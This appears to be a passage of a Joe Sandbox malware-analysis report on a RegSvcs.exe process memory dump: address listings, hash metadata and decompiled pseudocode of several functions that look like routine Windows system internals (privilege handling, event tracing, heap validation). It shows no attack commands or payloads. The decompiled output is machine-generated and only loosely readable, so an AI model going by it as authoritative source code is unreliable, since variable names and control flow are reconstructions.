                                          0x01365597
                                          0x01365597
                                          0x0136559f
                                          0x013655a2
                                          0x013655a5
                                          0x013655a5
                                          0x013213ec
                                          0x013213f2
                                          0x013213f4
                                          0x013213f8
                                          0x013213fe
                                          0x01321400
                                          0x01321406
                                          0x01321412
                                          0x01321419
                                          0x013655b0
                                          0x013655b5
                                          0x013655b8
                                          0x013655b8
                                          0x01321425
                                          0x01321429
                                          0x0132142c
                                          0x0132142f
                                          0x01321432
                                          0x01321435
                                          0x0132143a
                                          0x0132143d
                                          0x01321443
                                          0x01321446
                                          0x01321449
                                          0x01321450
                                          0x01321453
                                          0x01321459
                                          0x0132145f
                                          0x01321462
                                          0x01321467
                                          0x013214fa
                                          0x0132146d
                                          0x0132146d
                                          0x0132146d
                                          0x0132146f
                                          0x01321479
                                          0x01321480
                                          0x01321507
                                          0x01321508
                                          0x01321510
                                          0x013655c1
                                          0x013655c2
                                          0x013655cc
                                          0x013655d1
                                          0x013655d4
                                          0x013655d7
                                          0x013655d7
                                          0x01321482
                                          0x01321482
                                          0x01321482
                                          0x01321484
                                          0x0132149b
                                          0x013214a4
                                          0x013214ae
                                          0x013214b4
                                          0x013214b4
                                          0x013214ba
                                          0x013214c4
                                          0x013214c4
                                          0x013214c9
                                          0x013214cf
                                          0x013214d2
                                          0x013214d7
                                          0x013655df
                                          0x013655e0
                                          0x013655ea
                                          0x013214dd
                                          0x013214dd
                                          0x013214df
                                          0x013214e2
                                          0x013214e4
                                          0x013214e4
                                          0x013214e7
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
                                          • Instruction ID: f4ee7ec0aa5e56e548ed4258830269c7d61d34a5db07abf601f4322443648d9a
                                          • Opcode Fuzzy Hash: 1c33f6d9e34d70ec2c7411a2d2e90e11e394967e8af468a76c92d51e73907bb8
                                          • Instruction Fuzzy Hash: A081AC71A00745DFCB24DF68C584BAABBF9EF48358F148569E94AC7751D330EA41CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0138B8D0 Relevance: .2, Instructions: 199COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 39%
                                          			E0138B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x13e7b9c; // 0x0
				_t124 = L01314620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E01339800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E013395B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E013395D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L013177F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E01339910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E013395D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x13e7b9c; // 0x0
									_t92 = L01314620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E01339910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E012FA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E0138E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E0138E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E013395B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                          0x0138b8d9
                                          0x0138b8e4
                                          0x00000000
                                          0x0138b8e6
                                          0x0138b8f3
                                          0x0138b8f5
                                          0x0138b8f5
                                          0x0138b8f8
                                          0x0138b920
                                          0x0138b924
                                          0x0138b936
                                          0x0138b939
                                          0x0138b93d
                                          0x0138b948
                                          0x0138b9a0
                                          0x0138b9a0
                                          0x0138b9a4
                                          0x0138b9bf
                                          0x0138b9c4
                                          0x0138b9c6
                                          0x0138b9cd
                                          0x0138b9d1
                                          0x0138bad4
                                          0x0138bad8
                                          0x0138bada
                                          0x0138badc
                                          0x0138badc
                                          0x0138badf
                                          0x0138bae0
                                          0x0138bae2
                                          0x0138bae4
                                          0x0138baec
                                          0x0138baee
                                          0x0138baf0
                                          0x0138baf0
                                          0x0138baec
                                          0x0138bafb
                                          0x0138bafc
                                          0x0138bafe
                                          0x0138bb01
                                          0x0138bb01
                                          0x00000000
                                          0x0138bb06
                                          0x0138b9d7
                                          0x0138b9db
                                          0x0138b9db
                                          0x0138b9de
                                          0x0138b9de
                                          0x0138b9e4
                                          0x0138b9e7
                                          0x0138b9ea
                                          0x0138b9ec
                                          0x0138b9ef
                                          0x0138b9f3
                                          0x0138ba1b
                                          0x0138ba1b
                                          0x0138ba23
                                          0x0138ba24
                                          0x0138ba27
                                          0x0138ba2a
                                          0x0138ba2b
                                          0x0138ba2e
                                          0x0138ba30
                                          0x0138ba37
                                          0x0138ba3f
                                          0x0138ba9c
                                          0x0138baa2
                                          0x0138bb13
                                          0x0138bb15
                                          0x0138baae
                                          0x0138baae
                                          0x0138bab3
                                          0x0138bab5
                                          0x0138baba
                                          0x0138bac8
                                          0x0138bac8
                                          0x0138baba
                                          0x0138bacd
                                          0x0138bacf
                                          0x00000000
                                          0x0138bacf
                                          0x0138bb1a
                                          0x00000000
                                          0x0138bb1c
                                          0x0138baa7
                                          0x0138bb11
                                          0x00000000
                                          0x0138bb11
                                          0x0138baa9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0138ba41
                                          0x0138ba41
                                          0x0138ba41
                                          0x0138ba58
                                          0x0138ba5d
                                          0x0138ba62
                                          0x00000000
                                          0x00000000
                                          0x0138ba64
                                          0x0138ba67
                                          0x0138ba68
                                          0x0138ba69
                                          0x0138ba6c
                                          0x0138ba6f
                                          0x0138ba71
                                          0x0138ba78
                                          0x0138ba80
                                          0x00000000
                                          0x00000000
                                          0x0138ba90
                                          0x0138ba90
                                          0x0138ba97
                                          0x00000000
                                          0x0138ba97
                                          0x0138b9f5
                                          0x0138b9f7
                                          0x0138b9f7
                                          0x0138b9fa
                                          0x0138ba03
                                          0x0138ba07
                                          0x0138ba0c
                                          0x0138ba10
                                          0x0138ba17
                                          0x00000000
                                          0x0138b9f7
                                          0x0138b9a6
                                          0x0138b9a8
                                          0x0138b9af
                                          0x0138b9b3
                                          0x00000000
                                          0x00000000
                                          0x0138b9b9
                                          0x00000000
                                          0x0138b9b9
                                          0x0138b94d
                                          0x0138b98f
                                          0x0138b995
                                          0x0138b999
                                          0x0138b960
                                          0x0138b967
                                          0x0138b968
                                          0x0138b96a
                                          0x00000000
                                          0x0138b96a
                                          0x0138b99b
                                          0x0138b99e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0138b99e
                                          0x0138b951
                                          0x0138b954
                                          0x0138b95a
                                          0x0138b95e
                                          0x0138b972
                                          0x0138b979
                                          0x0138b97d
                                          0x0138b97f
                                          0x0138b980
                                          0x0138b982
                                          0x0138b984
                                          0x00000000
                                          0x0138b984
                                          0x00000000
                                          0x0138b926
                                          0x00000000
                                          0x0138b926

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: db37d9727141f2678b1eabfab2a70ff521c43482df5f53f82907001b3bf2a0af
                                          • Instruction ID: 13ec5246b9fbff1e9fac9fcb57c19e14c6d482874f6c7b5f0c97f7c10b5e4ac0
                                          • Opcode Fuzzy Hash: db37d9727141f2678b1eabfab2a70ff521c43482df5f53f82907001b3bf2a0af
                                          • Instruction Fuzzy Hash: 0C710F32200B07EFE732AF18C840F66FBE5EB44728F144528E6558B6A8DB75E941CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01376DC9 Relevance: .2, Instructions: 199COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 79%
                                          			E01376DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L01314620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E01376B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E01317D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E01339AE0();
					_t87 = L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E0137795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E0137795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E0137795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E0137795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L01314620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E01376B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E01376B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E01376B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E01376B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E01317D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E01339AE0();
								L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L01312400( &_v36);
							if(_v24 >= 0) {
								_t87 = L01312400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L01312400( &_v52);
							}
							if(_v28 >= 0) {
								return L01312400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                          0x01376dd4
                                          0x01376dde
                                          0x01376de1
                                          0x01376de3
                                          0x01376de6
                                          0x01376de9
                                          0x01376dec
                                          0x01376def
                                          0x01376df2
                                          0x01376df5
                                          0x01376dfe
                                          0x01376e04
                                          0x01376e09
                                          0x01376e0d
                                          0x01376e18
                                          0x01376e1b
                                          0x01376e22
                                          0x01376e2d
                                          0x01376e30
                                          0x01376e36
                                          0x01376e42
                                          0x01376e4d
                                          0x01376e50
                                          0x01376e55
                                          0x01376e5c
                                          0x01376e6e
                                          0x01376e5e
                                          0x01376e67
                                          0x01376e67
                                          0x01376e73
                                          0x01376e74
                                          0x01376e77
                                          0x01376e7c
                                          0x01376e7d
                                          0x01376e8e
                                          0x01376e93
                                          0x01376e9c
                                          0x01376ea8
                                          0x01376eab
                                          0x01376eac
                                          0x01376eb3
                                          0x01376ecd
                                          0x01376edc
                                          0x01376ee2
                                          0x01376ee5
                                          0x01376ef2
                                          0x01376efb
                                          0x01376f01
                                          0x01376f06
                                          0x01376f0b
                                          0x01376f11
                                          0x01376f1a
                                          0x01376f22
                                          0x01376f26
                                          0x01376f26
                                          0x01376f33
                                          0x01376f41
                                          0x01376f44
                                          0x01376f47
                                          0x01376f54
                                          0x01376f65
                                          0x01376f77
                                          0x01376f7c
                                          0x01376f82
                                          0x01376f91
                                          0x01376f99
                                          0x01376fa3
                                          0x01376fae
                                          0x01376fae
                                          0x01376fba
                                          0x01376fbb
                                          0x01376fbc
                                          0x01376fc1
                                          0x01376fc2
                                          0x01376fd3
                                          0x01376fd8
                                          0x01376fd8
                                          0x01376fdf
                                          0x01376fe8
                                          0x01376fee
                                          0x01376fee
                                          0x01376ff5
                                          0x01376ffb
                                          0x01376ffb
                                          0x01377004
                                          0x00000000
                                          0x0137700a
                                          0x01377004
                                          0x01376eb3
                                          0x01376e9c
                                          0x01377015

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                          • Instruction ID: 1047db19d71545cc51ac97ccd1c04f0a400f6b803bbe5a1b201c37f8e3680ac4
                                          • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                          • Instruction Fuzzy Hash: 53718D71E0060AEFDB15DFA9C984EEEBBB9FF48718F144469E504E7250DB34AA41CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 013B1002 Relevance: .2, Instructions: 198COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E013B1002(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _t75;
				intOrPtr* _t76;
				signed int _t77;
				signed short _t78;
				signed short _t80;
				signed int _t81;
				signed short _t82;
				signed short _t83;
				signed short _t85;
				signed int _t86;
				void* _t90;
				signed short _t91;
				signed int _t95;
				signed short _t97;
				signed short _t99;
				intOrPtr* _t101;
				signed short _t102;
				signed int _t103;
				signed short _t105;
				intOrPtr _t106;
				signed int* _t108;
				signed short _t109;
				signed short _t111;
				signed short _t112;
				signed int _t113;
				signed short _t117;
				signed int _t120;
				void* _t121;
				signed int _t122;
				signed int _t126;
				signed int* _t127;
				signed short _t128;
				intOrPtr _t129;
				intOrPtr _t130;
				signed int _t132;
				signed int _t133;

				_t121 = __edx;
				_t130 = __ecx;
				_v16 = __ecx;
				_t108 = __ecx + 0xa4;
				_t75 =  *_t108;
				L4:
				L4:
				if(_t75 != _t108) {
					goto L1;
				} else {
					_t127 = _t130 + 0x9c;
					_t120 =  *_t127;
				}
				while(_t120 != _t127) {
					_t132 = _t120 & 0xffff0000;
					__eflags = _t132 - _t121;
					if(_t132 <= _t121) {
						_t75 =  *((intOrPtr*)(_t120 + 0x14)) + _t132;
						__eflags = _t75 - _t121;
						if(_t75 > _t121) {
							 *0x13e5898 = 5;
						}
					}
					_t120 =  *_t120;
				}
				L68:
				return _t75;
				L1:
				_t3 = _t75 - 0x10; // -16
				_t126 = _t3;
				_v20 = _t126;
				__eflags =  *((intOrPtr*)(_t126 + 0x1c)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x1c)) > _t121) {
					L3:
					_t75 =  *_t75;
					goto L4;
				}
				__eflags =  *((intOrPtr*)(_t126 + 0x28)) - _t121;
				if( *((intOrPtr*)(_t126 + 0x28)) > _t121) {
					_t8 = _t126 + 0x38; // 0x28
					_t101 = _t8;
					_t109 = 0;
					_v8 = _v8 & 0;
					_t76 =  *_t101;
					_v12 = _t101;
					__eflags = _t76 - _t101;
					if(_t76 == _t101) {
						L17:
						_t102 = 0;
						_v20 = 0;
						__eflags = _t109;
						if(_t109 == 0) {
							_t109 = _t126;
						}
						_t128 = 0;
						__eflags = _t109 - _t121;
						if(_t109 >= _t121) {
							L29:
							_t111 = _v8 + 0xfffffff8;
							__eflags = _t111 - _t121;
							if(_t111 <= _t121) {
								L33:
								 *0x13e58b0 = _t128;
								 *0x13e58b4 = _t102;
								__eflags = _t128;
								if(_t128 == 0) {
									L42:
									__eflags =  *(_t130 + 0x4c);
									if( *(_t130 + 0x4c) == 0) {
										_t77 =  *_t128 & 0x0000ffff;
										_t112 = 0;
										__eflags = 0;
									} else {
										_t85 =  *_t128;
										_t112 =  *(_t130 + 0x4c);
										__eflags = _t85 & _t112;
										if((_t85 & _t112) != 0) {
											_t85 = _t85 ^  *(_t130 + 0x50);
											__eflags = _t85;
										}
										_t77 = _t85 & 0x0000ffff;
									}
									_v8 = _t77;
									__eflags = _t102;
									if(_t102 != 0) {
										_t117 =  *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t117;
										 *0x13e58b8 = _t117;
										_t112 =  *(_t130 + 0x4c);
									}
									__eflags = _t112;
									if(_t112 == 0) {
										_t78 =  *_t128 & 0x0000ffff;
									} else {
										_t83 =  *_t128;
										__eflags =  *(_t130 + 0x4c) & _t83;
										if(( *(_t130 + 0x4c) & _t83) != 0) {
											_t83 = _t83 ^  *(_t130 + 0x50);
											__eflags = _t83;
										}
										_t78 = _t83 & 0x0000ffff;
									}
									_t122 = _t78 & 0x0000ffff;
									 *0x13e58bc = _t122;
									__eflags =  *(_t130 + 0x4c);
									_t113 = _v8 & 0x0000ffff;
									if( *(_t130 + 0x4c) == 0) {
										_t80 =  *(_t128 + _t113 * 8) & 0x0000ffff;
									} else {
										_t82 =  *(_t128 + _t113 * 8);
										__eflags =  *(_t130 + 0x4c) & _t82;
										if(( *(_t130 + 0x4c) & _t82) != 0) {
											_t82 = _t82 ^  *(_t130 + 0x50);
											__eflags = _t82;
										}
										_t122 =  *0x13e58bc; // 0x0
										_t80 = _t82 & 0x0000ffff;
									}
									_t81 = _t80 & 0x0000ffff;
									__eflags =  *0x13e58b8 - _t81; // 0x0
									if(__eflags == 0) {
										_t75 =  *(_t130 + 0x54) & 0x0000ffff;
										__eflags = _t122 - ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75);
										if(_t122 == ( *(_t128 + 4 + _t113 * 8) & 0x0000ffff ^ _t75)) {
											goto L68;
										}
										 *0x13e5898 = 7;
										return _t75;
									} else {
										 *0x13e5898 = 6;
										return _t81;
									}
								}
								__eflags = _t102;
								if(_t102 == 0) {
									goto L42;
								}
								__eflags =  *(_t130 + 0x4c);
								if( *(_t130 + 0x4c) == 0) {
									_t86 =  *_t128 & 0x0000ffff;
								} else {
									_t91 =  *_t128;
									__eflags =  *(_t130 + 0x4c) & _t91;
									if(( *(_t130 + 0x4c) & _t91) != 0) {
										_t91 = _t91 ^  *(_t130 + 0x50);
										__eflags = _t91;
									}
									_t86 = _t91 & 0x0000ffff;
								}
								_v8 = _t86;
								_t90 = _t128 + (_v8 & 0x0000ffff) * 8;
								__eflags = _t90 - _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3);
								if(_t90 == _t102 - (( *(_t102 + 4) & 0x0000ffff ^  *(_t130 + 0x54) & 0x0000ffff) << 3)) {
									goto L42;
								} else {
									 *0x13e5898 = 4;
									return _t90;
								}
							}
							_v20 =  *(_t130 + 0x54) & 0x0000ffff;
							while(1) {
								_t102 = _t111;
								_t95 = ( *(_t111 + 4) ^ _v20) & 0x0000ffff;
								__eflags = _t95;
								if(_t95 == 0) {
									goto L33;
								}
								_t111 = _t111 + _t95 * 0xfffffff8;
								__eflags = _t111 - _t121;
								if(_t111 > _t121) {
									continue;
								}
								goto L33;
							}
							goto L33;
						} else {
							_t103 =  *(_t130 + 0x4c);
							while(1) {
								_t128 = _t109;
								__eflags = _t103;
								if(_t103 == 0) {
									_t97 =  *_t109 & 0x0000ffff;
								} else {
									_t99 =  *_t109;
									_t103 =  *(_t130 + 0x4c);
									__eflags = _t99 & _t103;
									if((_t99 & _t103) != 0) {
										_t99 = _t99 ^  *(_t130 + 0x50);
										__eflags = _t99;
									}
									_t97 = _t99 & 0x0000ffff;
								}
								__eflags = _t97;
								if(_t97 == 0) {
									break;
								}
								_t109 = _t109 + (_t97 & 0x0000ffff) * 8;
								__eflags = _t109 - _t121;
								if(_t109 < _t121) {
									continue;
								}
								break;
							}
							_t102 = _v20;
							goto L29;
						}
					}
					_t133 = _v8;
					do {
						_t105 =  *((intOrPtr*)(_t76 + 0xc)) +  *((intOrPtr*)(_t76 + 8));
						_t129 = _v12;
						__eflags = _t105 - _t121;
						if(_t105 < _t121) {
							__eflags = _t105 - _t109;
							if(_t105 > _t109) {
								_t109 = _t105;
							}
						}
						_t106 =  *((intOrPtr*)(_t76 + 8));
						__eflags = _t106 - _t121;
						if(_t106 > _t121) {
							__eflags = _t133;
							if(_t133 == 0) {
								L14:
								_t18 = _t76 - 8; // -8
								_t133 = _t18;
								goto L15;
							}
							__eflags = _t106 -  *((intOrPtr*)(_t133 + 0x10));
							if(_t106 >=  *((intOrPtr*)(_t133 + 0x10))) {
								goto L15;
							}
							goto L14;
						}
						L15:
						_t76 =  *_t76;
						__eflags = _t76 - _t129;
					} while (_t76 != _t129);
					_t126 = _v20;
					_v8 = _t133;
					_t130 = _v16;
					goto L17;
				}
				goto L3;
			}











































                                          0x013b1002
                                          0x013b100c
                                          0x013b100f
                                          0x013b1012
                                          0x013b1018
                                          0x00000000
                                          0x013b102e
                                          0x013b1030
                                          0x00000000
                                          0x013b1032
                                          0x013b1032
                                          0x013b1038
                                          0x013b1038
                                          0x013b121e
                                          0x013b11ff
                                          0x013b1205
                                          0x013b1207
                                          0x013b120c
                                          0x013b120e
                                          0x013b1210
                                          0x013b1212
                                          0x013b1212
                                          0x013b1210
                                          0x013b121c
                                          0x013b121c
                                          0x013b1228
                                          0x013b1228
                                          0x013b101c
                                          0x013b101c
                                          0x013b101c
                                          0x013b101f
                                          0x013b1022
                                          0x013b1025
                                          0x013b102c
                                          0x013b102c
                                          0x00000000
                                          0x013b102c
                                          0x013b1027
                                          0x013b102a
                                          0x013b103f
                                          0x013b103f
                                          0x013b1042
                                          0x013b1044
                                          0x013b1047
                                          0x013b1049
                                          0x013b104c
                                          0x013b104e
                                          0x013b1088
                                          0x013b1088
                                          0x013b108a
                                          0x013b108d
                                          0x013b108f
                                          0x013b1091
                                          0x013b1091
                                          0x013b1093
                                          0x013b1095
                                          0x013b1097
                                          0x013b10c8
                                          0x013b10cb
                                          0x013b10ce
                                          0x013b10d0
                                          0x013b10f4
                                          0x013b10f4
                                          0x013b10fa
                                          0x013b1100
                                          0x013b1102
                                          0x013b1150
                                          0x013b1150
                                          0x013b1154
                                          0x013b1167
                                          0x013b116a
                                          0x013b116a
                                          0x013b1156
                                          0x013b1156
                                          0x013b1158
                                          0x013b115b
                                          0x013b115d
                                          0x013b115f
                                          0x013b115f
                                          0x013b115f
                                          0x013b1162
                                          0x013b1162
                                          0x013b116c
                                          0x013b116f
                                          0x013b1171
                                          0x013b117b
                                          0x013b117b
                                          0x013b117d
                                          0x013b1183
                                          0x013b1183
                                          0x013b1186
                                          0x013b1188
                                          0x013b1199
                                          0x013b118a
                                          0x013b118a
                                          0x013b118c
                                          0x013b118f
                                          0x013b1191
                                          0x013b1191
                                          0x013b1191
                                          0x013b1194
                                          0x013b1194
                                          0x013b119c
                                          0x013b11a2
                                          0x013b11a8
                                          0x013b11ac
                                          0x013b11af
                                          0x013b11c7
                                          0x013b11b1
                                          0x013b11b1
                                          0x013b11b4
                                          0x013b11b7
                                          0x013b11b9
                                          0x013b11b9
                                          0x013b11b9
                                          0x013b11bc
                                          0x013b11c2
                                          0x013b11c2
                                          0x013b11cb
                                          0x013b11ce
                                          0x013b11d4
                                          0x013b11e7
                                          0x013b11ed
                                          0x013b11ef
                                          0x00000000
                                          0x00000000
                                          0x013b11f1
                                          0x00000000
                                          0x013b11d6
                                          0x013b11d6
                                          0x00000000
                                          0x013b11d6
                                          0x013b11d4
                                          0x013b1104
                                          0x013b1106
                                          0x00000000
                                          0x00000000
